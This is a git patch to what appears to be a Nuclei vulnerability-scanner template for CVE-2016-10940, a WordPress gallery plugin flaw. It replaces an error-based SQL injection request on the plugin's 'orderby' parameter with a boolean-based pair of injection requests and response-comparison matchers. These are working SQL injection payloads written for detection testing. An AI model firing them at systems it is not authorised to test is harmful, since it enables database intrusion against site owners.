From bbd80d10d43b7ae132978f0a8a0a1c3f4a89259a Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Sat, 5 Feb 2022 01:20:21 +0530 Subject: [PATCH] Update CVE-2016-10940.yaml --- cves/2016/CVE-2016-10940.yaml | 23 ++++++++++++----------- 1 file changed, 12 insertions(+), 11 deletions(-) diff --git a/cves/2016/CVE-2016-10940.yaml b/cves/2016/CVE-2016-10940.yaml index 3742ee1337..609a4c33d4 100644 --- a/cves/2016/CVE-2016-10940.yaml +++ b/cves/2016/CVE-2016-10940.yaml @@ -28,20 +28,21 @@ requests: log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1 - | - GET /wp-admin/admin.php?page=zm_gallery&orderby=name&order=desc%2CEXTRACTVALUE%283991%2CCONCAT%280x5c%2C0x7170707671%2C%28SELECT+%28ELT%283991%3D3991%2C1%29%29%29%2C0x7178717671%29%29 HTTP/1.1 + GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7422)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1 Host: {{Hostname}} + - | + GET /wp-admin/admin.php?page=zm_gallery&orderby=(SELECT%20(CASE%20WHEN%20(7422=7421)%20THEN%200x6e616d65%20ELSE%20(SELECT%203211%20UNION%20SELECT%208682)%20END))&order=desc HTTP/1.1 + Host: {{Hostname}} + + req-condition: true cookie-reuse: true matchers-condition: and matchers: - - type: word - part: body - words: - - "ZM Gallery Plugin" - - "XPATH syntax error" - - "EXTRACTVALUE(" - condition: and + - type: dsl + dsl: + - 'contains(body_2, "")' - - type: status - status: - - 200 + - type: dsl + dsl: + - '!contains(body_3, "")'